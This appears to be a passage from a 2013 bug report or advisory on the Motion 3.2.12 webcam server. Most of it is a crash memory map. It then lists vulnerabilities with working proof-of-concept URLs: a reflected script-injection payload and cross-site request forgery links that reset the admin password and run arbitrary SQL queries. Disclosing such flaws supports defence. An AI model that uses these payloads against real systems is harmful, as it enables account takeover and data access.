b5f6e000-b5f6f000 rw-p 00014000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f6f000-b5f72000 rw-p 00000000 00:00 0
b5f72000-b5f74000 r-xp 00000000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f74000-b5f75000 r--p 00002000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f75000-b5f76000 rw-p 00003000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f76000-b5f7d000 r-xp 00000000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f7d000-b5f7e000 r--p 00006000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f7e000-b5f7f000 rw-p 00007000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f7f000-b5fa5000 r-xp 00000000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5fa5000-b5fa6000 r--p 00025000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5fa6000-b5fa7000 rw-p 00026000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5fa7000-b5faa000 r-xp 00000000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5faa000-b5fab000 r--p 00002000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5fab000-b5fac000 rw-p 00003000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5fac000-b5fc8000 r-xp 00000000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5fc8000-b5fc9000 r--p 0001b000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5fc9000-b5fca000 rw-p 0001c000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5fca000-b5fcb000 rw-p 00000000 00:00 0
b5fcb000-b6056000 r-xp 00000000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b6056000-b6057000 r--p 0008a000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b6057000-b605b000 rw-p 0008b000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b605b000-b6061000 r-xp 00000000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6061000-b6062000 r--p 00005000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6062000-b6063000 rw-p 00006000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6063000-b60b1000 r-xp 00000000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b1000-b60b2000 ---p 0004e000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b2000-b60b3000 r--p 0004e000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b3000-b60b4000 rw-p 0004f000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b4000-b60b5000 rw-p 00000000 00:00 0
b60b5000-b60f0000 r-xp 00000000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f0000-b60f1000 ---p 0003b000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f1000-b60f2000 r--p 0003b000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f2000-b60f3000 rw-p 0003c000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f3000-b60f6000 r-xp 00000000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b60f6000-b60f7000 r--p 00002000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b60f7000-b60f8000 rw-p 00003000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b60f8000-b60f9000 rw-p 00000000 00:00 0
b60f9000-b61c1000 r-xp 00000000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b61c1000-b61c7000 r--p 000c7000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b61c7000-b61c8000 rw-p 000cd000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b61c8000-b635a000 r-xp 00000000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b635a000-b6369000 r--p 00192000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6369000-b6370000 rw-p 001a1000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6370000-b6373000 rw-p 00000000 00:00 0
b6373000-b63c2000 r-xp 00000000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b63c2000-b63c3000 ---p 0004f000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b63c3000-b63c5000 r--p 0004f000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b63c5000-b63c9000 rw-p 00051000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b63c9000-b63d9000 r-xp 00000000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b63d9000-b63da000 r--p 0000f000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b63da000-b63db000 rw-p 00010000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b63db000-b63df000 rw-p 00000000 00:00 0
b63df000-b63eb000 r-xp 00000000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b63eb000-b63ec000 r--p 0000b000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b63ec000-b63ed000 rw-p 0000c000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b63ed000-b63ee000 rw-p 00000000 00:00 0
b63ee000-b64a9000 r-xp 00000000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b64a9000-b64ab000 r--p 000ba000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b64ab000-b64ac000 rw-p 000bc000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b64ac000-b64cb000 r-xp 00000000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b64cb000-b64cc000 r--p 0001e000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b64cc000-b64cd000 rw-p 0001f000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b64cd000-b64e8000 r-xp 00000000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b64e8000-b64e9000 r--p 0001a000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b64e9000-b64ea000 rw-p 0001b000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b64ea000-b6529000 r-xp 00000000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b6529000-b652a000 r--p 0003f000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b652a000-b652b000 rw-p 00040000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b652b000-b6554000 r-xp 00000000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b6554000-b6555000 r--p 00028000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b6555000-b6556000 rw-p 00029000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b6556000-b6557000 rw-p 00000000 00:00 0
b6557000-b66bd000 r-xp 00000000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b66bd000-b66ce000 r--p 00165000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b66ce000-b66cf000 rw-p 00176000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b66cf000-b676b000 r-xp 00000000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b676b000-b676c000 r--p 0009c000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b676c000-b676d000 rw-p 0009d000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b676d000-b6777000 rw-p 00000000 00:00 0
b6777000-b678b000 r-xp 00000000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b678b000-b678c000 r--p 00013000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b678c000-b678d000 rw-p 00014000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b678d000-b679c000 r-xp 00000000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b679c000-b679d000 r--p 0000e000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b679d000-b679e000 rw-p 0000f000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b679e000-b67c8000 r-xp 00000000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b67c8000-b67c9000 r--p 00029000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b67c9000-b67ca000 rw-p 0002a000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b67ca000-b67cb000 rw-p 00000000 00:00 0
b67cb000-b696e000 r-xp 00000000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b696e000-b696f000 ---p 001a3000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b696f000-b6971000 r--p 001a3000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6971000-b6972000 rw-p 001a5000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6972000-b6975000 rw-p 00000000 00:00 0
b6975000-b699c000 r-xp 00000000 08:11 13107298 /usr/lib/libpq.so.5.4
b699c000-b699d000 r--p 00027000 08:11 13107298 /usr/lib/libpq.so.5.4
b699d000-b699e000 rw-p 00028000 08:11 13107298 /usr/lib/libpq.so.5.4
b699e000-b69bb000 r-xp 00000000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b69bb000-b69bc000 r--p 0001c000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b69bc000-b69bd000 rw-p 0001d000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b69bd000-b69c0000 rw-p 00000000 00:00 0
b69c0000-b709e000 r-xp 00000000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b709e000-b709f000 r--p 006de000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b709f000-b70ae000 rw-p 006df000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b70ae000-b761c000 rw-p 00000000 00:00 0
b761c000-b7729000 r-xp 00000000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b7729000-b772a000 r--p 0010c000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b772a000-b7732000 rw-p 0010d000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b7732000-b7733000 rw-p 00000000 00:00 0
b7733000-b7755000 r-xp 00000000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b7755000-b7756000 r--p 00022000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b7756000-b7757000 rw-p 00023000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b7757000-b776e000 r-xp 00000000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b776e000-b776f000 r--p 00016000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b776f000-b7770000 rw-p 00017000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7770000-b7772000 rw-p 00000000 00:00 0
b777f000-b7782000 rw-p 00000000 00:00 0
b7782000-b7783000 r-xp 00000000 00:00 0 [vdso]
b7783000-b77a3000 r-xp 00000000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
b77a3000-b77a4000 r--p 0001f000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
b77a4000-b77a5000 rw-p 00020000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
bfebf000-bfee1000 rw-p 00000000 00:00 0 [stack]
Aborted
Cross Site Scripting vulnerability:
It's possible to execute script code on the client-side browser through the "process_id_file" parameter.
The following Proof of Concept url will display a popup with the text XSS:
http://<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>
Solution: Sanitise user input values
Cross Site Request Forgery:
The following urls show that it's possible to reset a password, change the SQL query by sending a complete URL to the victim. If the victim clicks on the url, it will execute the command without any further checking.
http://<IP>:<PORT>/0/config/set?control_authentication=admin:mypassword (Set admin password)
http://<IP>:<PORT>/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL query)
See the following URL for more information on CSRF and solutions: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Environment
Motion version: |
3.2.12 |
ffmpeg version: |
|
Shared libraries: |
ffmpeg |
Server OS: |
Ubuntu 12.04 |
--
RvH - 07 Mar 2013
Follow up
A fix for this is currently being pursued.
Fix record